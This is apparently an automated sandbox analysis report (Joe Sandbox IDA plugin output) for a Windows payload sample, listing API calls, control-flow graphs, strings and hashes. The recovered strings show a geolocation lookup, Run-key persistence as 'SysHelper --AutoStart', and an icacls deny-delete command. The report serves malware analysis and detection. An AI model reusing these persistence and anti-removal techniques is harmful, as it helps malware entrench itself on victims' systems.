                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004822FE
                                                                                                  • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00482315
                                                                                                  • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0048232C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00482347
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                  • API String ID: 3668891214-3807497772
                                                                                                  • Opcode ID: ff4af95c084569fb6952f81c18c588cb2af5efe2c6929ed06e41bec62516cdd6
                                                                                                  • Instruction ID: 500fb70e50f4fed89e3d4605f843393a08231360f5920979de36ef61f03e97a8
                                                                                                  • Opcode Fuzzy Hash: ff4af95c084569fb6952f81c18c588cb2af5efe2c6929ed06e41bec62516cdd6
                                                                                                  • Instruction Fuzzy Hash: 28315571E00219AFDF10AFE5DC45EAEBBB8FF55704F004466F904E2250DBB49A059F95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 903 47cf10-47cfb0 call 49f7c0 call 49b420 InternetOpenW call 485c10 InternetOpenUrlW 910 47cfb2-47cfb4 903->910 911 47cfb9-47cffb InternetReadFile InternetCloseHandle * 2 call 4856d0 903->911 912 47d213-47d217 910->912 916 47d000-47d01d 911->916 914 47d224-47d236 912->914 915 47d219-47d221 call 492587 912->915 915->914 918 47d023-47d02c 916->918 919 47d01f-47d021 916->919 922 47d030-47d035 918->922 921 47d039-47d069 call 4856d0 call 484300 919->921 928 47d06f-47d08b call 483010 921->928 929 47d1cb 921->929 922->922 924 47d037 922->924 924->921 935 47d08d-47d091 928->935 936 47d0b9-47d0bd 928->936 931 47d1cd-47d1d1 929->931 933 47d1d3-47d1db call 492587 931->933 934 47d1de-47d1f4 931->934 933->934 938 47d1f6-47d1fe call 492587 934->938 939 47d201-47d20f 934->939 941 47d093-47d09b call 492587 935->941 942 47d09e-47d0b4 call 483d40 935->942 944 47d0bf-47d0ca call 492587 936->944 945 47d0cd-47d0e1 call 484300 936->945 938->939 939->912 941->942 942->936 944->945 945->929 954 47d0e7-47d149 call 483010 945->954 957 47d150-47d15a 954->957 958 47d160-47d162 957->958 959 47d15c-47d15e 957->959 961 47d165-47d16a 958->961 960 47d16e-47d18b call 47b650 959->960 965 47d18d-47d18f 960->965 966 47d19a-47d19e 960->966 961->961 962 47d16c 961->962 962->960 965->966 967 47d191-47d198 965->967 966->957 968 47d1a0 966->968 967->966 969 47d1c7-47d1c9 967->969 970 47d1a2-47d1a6 968->970 969->970 971 47d1b3-47d1c5 970->971 972 47d1a8-47d1b0 call 492587 970->972 971->931 972->971
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0047CF4A
                                                                                                  • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0047CF5F
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047CFA6
                                                                                                  • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0047CFCD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0047CFDA
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0047CFDD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-933853286
                                                                                                  • Opcode ID: dd1f17ee9d39a0a8f380cd6668b46572921dcb6ff4fa59dbced51a94560ef596
                                                                                                  • Instruction ID: f7543f2e0a08064662c2c5409f92c2baba0e7df97939a6920d4344f19eee911f
                                                                                                  • Opcode Fuzzy Hash: dd1f17ee9d39a0a8f380cd6668b46572921dcb6ff4fa59dbced51a94560ef596
                                                                                                  • Instruction Fuzzy Hash: 6D91B070D00248EBEF20DFA0DD45BEEBBB4AF05708F60846AE40977281D7BA5A49DB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 606 481cd0-481d1a call 49f7c0 RegOpenKeyExW 609 481d20-481d8d call 49b420 RegQueryValueExW RegCloseKey 606->609 610 482207-482216 606->610 613 481d8f-481d91 609->613 614 481d93-481d9c 609->614 615 481daf-481dcb call 485c10 613->615 616 481da0-481da9 614->616 620 481e7c-481e87 615->620 621 481dd1-481df8 lstrlenA call 483520 615->621 616->616 617 481dab-481dad 616->617 617->615 623 481e89-481e91 call 492587 620->623 624 481e94-481f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 620->624 628 481e28-481e2c 621->628 629 481dfa-481dfe 621->629 623->624 633 481f3a-481f3f 624->633 634 481f36-481f38 624->634 631 481e3c-481e50 PathFileExistsW 628->631 632 481e2e-481e39 call 492587 628->632 635 481e0b-481e23 call 4845a0 629->635 636 481e00-481e08 call 492587 629->636 631->620 640 481e52-481e57 631->640 632->631 639 481f40-481f49 633->639 638 481f4f-481f96 call 485c10 RpcStringFreeW PathAppendW CreateDirectoryW 634->638 635->628 636->635 653 481f98-481fa0 638->653 654 481fce-481fe9 638->654 639->639 644 481f4b-481f4d 639->644 645 481e59-481e5e 640->645 646 481e6a-481e6e 640->646 644->638 645->646 649 481e60-481e65 call 484690 645->649 646->610 651 481e74-481e77 646->651 649->646 655 4821ff-482204 call 492587 651->655 658 481fa2-481fa4 653->658 659 481fa6-481faf 653->659 656 481feb-481fed 654->656 657 481fef-481ff8 654->657 655->610 661 48200f-482076 call 485c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->661 662 482000-482009 657->662 663 481fbf-481fc9 call 485c10 658->663 665 481fb0-481fb9 659->665 671 48207c-482107 call 49b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->671 672 4821d1-4821d5 661->672 662->662 666 48200b-48200d 662->666 663->654 665->665 668 481fbb-481fbd 665->668 666->661 668->663 680 482109-482110 call 483260 671->680 681 482115-4821a8 call 49b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 671->681 673 4821e2-4821fa 672->673 674 4821d7-4821df call 492587 672->674 673->610 677 4821fc 673->677 674->673 677->655 680->681 685 4821aa-4821b0 GetLastError 681->685 686 4821b2-4821b8 681->686 685->672 687 4821c0-4821cf WaitForSingleObject 686->687 687->672 687->687
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D12
                                                                                                  • _memset.LIBCMT ref: 00481D3B
                                                                                                  • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00481D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0053AC68,000000FF), ref: 00481D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00481DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00481E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00481E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00481EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00481EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00481EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00481ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00481EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00481EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00481F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00481F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00481F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00481F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 0048202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00482036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0048204C
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0048206E
                                                                                                  • _memset.LIBCMT ref: 00482090
                                                                                                  • lstrcpyW.KERNEL32(?,005702FC), ref: 004820AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 004820C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 004820CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 004820D7
                                                                                                  • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004820F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004820FC
                                                                                                  • _memset.LIBCMT ref: 00482120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00482146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00482158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0048216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: 1b0c62c5955bd7628149a846b5319d905633f3551b69a3f3b24d21e5517b2b5f
                                                                                                  • Instruction ID: 76653d7ccd4ec9fb2d3a0a6dbce408fb0ae0ad2ca296ae50a1e7e2e1d7afdcc1
                                                                                                  • Opcode Fuzzy Hash: 1b0c62c5955bd7628149a846b5319d905633f3551b69a3f3b24d21e5517b2b5f
                                                                                                  • Instruction Fuzzy Hash: 3AE16F71D00219EBDF24EBA0DD49BEEBBB8BF04304F10446AE605B6291EB746A49DF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 975 493576-49358f 976 4935a9-4935be call 49b420 975->976 977 493591-49359b call 495208 call 4942d2 975->977 976->977 983 4935c0-4935c3 976->983 984 4935a0 977->984 985 4935c5 983->985 986 4935d7-4935dd 983->986 989 4935a2-4935a8 984->989 990 4935cb-4935d5 call 495208 985->990 991 4935c7-4935c9 985->991 987 4935e9 call 49fb64 986->987 988 4935df 986->988 996 4935ee-4935fa call 49f803 987->996 988->990 993 4935e1-4935e7 988->993 990->984 991->986 991->990 993->987 993->990 999 493600-49360c call 49f82d 996->999 1000 4937e5-4937ef call 4942fd 996->1000 999->1000 1005 493612-49361e call 49f857 999->1005 1005->1000 1008 493624-49362b 1005->1008 1009 49369b-4936a6 call 49f939 1008->1009 1010 49362d 1008->1010 1009->989 1016 4936ac-4936af 1009->1016 1011 49362f-493635 1010->1011 1012 493637-493653 call 49f939 1010->1012 1011->1009 1011->1012 1012->989 1020 493659-49365c 1012->1020 1018 4936de-4936eb 1016->1018 1019 4936b1-4936ba call 49fbb4 1016->1019 1022 4936ed-4936fc call 4a05a0 1018->1022 1019->1018 1028 4936bc-4936dc 1019->1028 1023 49379e-4937a0 1020->1023 1024 493662-49366b call 49fbb4 1020->1024 1031 493709-493730 call 4a04f0 call 4a05a0 1022->1031 1032 4936fe-493706 1022->1032 1023->989 1024->1023 1033 493671-493689 call 49f939 1024->1033 1028->1022 1041 49373e-493765 call 4a04f0 call 4a05a0 1031->1041 1042 493732-49373b 1031->1042 1032->1031 1033->989 1038 49368f-493696 1033->1038 1038->1023 1047 493773-493782 call 4a04f0 1041->1047 1048 493767-493770 1041->1048 1042->1041 1051 4937af-4937c8 1047->1051 1052 493784 1047->1052 1048->1047 1053 49379b 1051->1053 1054 4937ca-4937e3 1051->1054 1055 49378a-493798 1052->1055 1056 493786-493788 1052->1056 1053->1023 1054->1023 1055->1053 1056->1055 1057 4937a5-4937a7 1056->1057 1057->1023 1058 4937a9 1057->1058 1058->1051 1059 4937ab-4937ad 1058->1059 1059->1023 1059->1051
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004935B1
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  • __gmtime64_s.LIBCMT ref: 0049364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00493680
                                                                                                  • __gmtime64_s.LIBCMT ref: 0049369D
                                                                                                  • __allrem.LIBCMT ref: 004936F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049370F
                                                                                                  • __allrem.LIBCMT ref: 00493726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493744
                                                                                                  • __allrem.LIBCMT ref: 0049375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: fa1974f9c41682421c3f11aee8e61275e8ad34969c8e5080cc82c0f6630bea81
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: D1710AB1A00716BBDF149E7ACC41B5A7BA4AF06329F14827BF514D6781E778EE008798
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1060 4940f6 1062 49403b-494051 call 4a21a1 1060->1062 1063 4940b2 1060->1063 1076 49405b-494065 call 497c68 1062->1076 1077 494053-49405a call 497c2e 1062->1077 1064 494090-494095 call 497c59 1063->1064 1065 4940b4-4940b8 1063->1065 1075 4940c5-4940d3 call 498565 1064->1075 1068 4940ba-4940bb call 497cec 1065->1068 1069 4940c0 call 497c4a 1065->1069 1068->1069 1069->1075 1084 49406e-494088 call 4a2a1c call 489f90 1076->1084 1085 494067-49406d call 497c2e 1076->1085 1077->1076 1084->1064 1092 49408a-49408b call 497f3d 1084->1092 1085->1084 1092->1064
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2587630013-0
                                                                                                  • Opcode ID: ff9004b86f28ef2d53b8ad74104a238047fa62bd8811c8a377b8b42d45897fab
                                                                                                  • Instruction ID: 6e04096d80d17bcaa3f2b8a71cf45a7fc3158ea15067e3bc801940c623dc1ba4
                                                                                                  • Opcode Fuzzy Hash: ff9004b86f28ef2d53b8ad74104a238047fa62bd8811c8a377b8b42d45897fab
                                                                                                  • Instruction Fuzzy Hash: BFF0FF20A0A312A8DF3173B79916B9F1E545F9276CF20057FF700A61C3DE9C890283AE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1094 497b0b-497b1a call 497ad7 ExitProcess
                                                                                                  APIs
                                                                                                  • ___crtCorExitProcess.LIBCMT ref: 00497B11
                                                                                                    • Part of subcall function 00497AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;I,00497B16,i;I,?,00498BCA,000000FF,0000001E,00577BD0,00000008,00498B0E,i;I,i;I), ref: 00497AE6
                                                                                                    • Part of subcall function 00497AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00497AF8
                                                                                                  • ExitProcess.KERNEL32 ref: 00497B1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                  • String ID: i;I
                                                                                                  • API String ID: 2427264223-2348105649
                                                                                                  • Opcode ID: 03d3de33091e0c25d22551935f4fcb6d6f64d9e6c912831c8ed4282104ae6f52
                                                                                                  • Instruction ID: d26267cb83a6332c2adc7ad2ec5b2a71e15726822502e50ba428a7760f8a4633
                                                                                                  • Opcode Fuzzy Hash: 03d3de33091e0c25d22551935f4fcb6d6f64d9e6c912831c8ed4282104ae6f52
                                                                                                  • Instruction Fuzzy Hash: 11B09230004108BBCF052F52DC0A85E7F2AEB40390F008025F90408131EBB2AE95ABC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1097 49fb64-49fb77 call 498520 1100 49fb79-49fb8c call 498af7 1097->1100 1101 49fba5-49fbaa call 498565 1097->1101 1106 49fb99-49fba0 call 49fbab 1100->1106 1107 49fb8e call 49fe47 1100->1107 1106->1101 1110 49fb93 1107->1110 1110->1106
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0049FB7B
                                                                                                    • Part of subcall function 00498AF7: __mtinitlocknum.LIBCMT ref: 00498B09
                                                                                                    • Part of subcall function 00498AF7: __amsg_exit.LIBCMT ref: 00498B15
                                                                                                    • Part of subcall function 00498AF7: EnterCriticalSection.KERNEL32(i;I,?,004950D7,0000000D), ref: 00498B22
                                                                                                  • __tzset_nolock.LIBCMT ref: 0049FB8E
                                                                                                    • Part of subcall function 0049FE47: __lock.LIBCMT ref: 0049FE6C
                                                                                                    • Part of subcall function 0049FE47: ____lc_codepage_func.LIBCMT ref: 0049FEB3
                                                                                                    • Part of subcall function 0049FE47: __getenv_helper_nolock.LIBCMT ref: 0049FED4
                                                                                                    • Part of subcall function 0049FE47: _free.LIBCMT ref: 0049FF07
                                                                                                    • Part of subcall function 0049FE47: _strlen.LIBCMT ref: 0049FF0E
                                                                                                    • Part of subcall function 0049FE47: __malloc_crt.LIBCMT ref: 0049FF15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1282695788-0
                                                                                                  • Opcode ID: c0d39e998de827b0f04c0d6ee62cf035245b2667ffc2095dfbc860b67b7aeb60
                                                                                                  • Instruction ID: cbb506addcacd7a819adc065025cb4c0b461e653e9e33a604cd77bab8ca6456a
                                                                                                  • Opcode Fuzzy Hash: c0d39e998de827b0f04c0d6ee62cf035245b2667ffc2095dfbc860b67b7aeb60
                                                                                                  • Instruction Fuzzy Hash: 0FE0E674441744DBDF20ABB6DD1A7187964AB11329F10913FD425611D24FBC15CDDB2F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1111 497f3d-497f47 call 497e0e 1113 497f4c-497f50 1111->1113
                                                                                                  APIs
                                                                                                  • _doexit.LIBCMT ref: 00497F47
                                                                                                    • Part of subcall function 00497E0E: __lock.LIBCMT ref: 00497E1C
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(00577B08,0000001C,00497CFB,00493B69,00000001,00000000,i;I,00497C49,000000FF,?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497E5B
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497E6C
                                                                                                    • Part of subcall function 00497E0E: EncodePointer.KERNEL32(00000000,?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497E85
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(-00000004,?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497E95
                                                                                                    • Part of subcall function 00497E0E: EncodePointer.KERNEL32(00000000,?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497E9B
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497EB1
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(?,00498B1A,00000011,i;I,?,004950D7,0000000D), ref: 00497EBC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
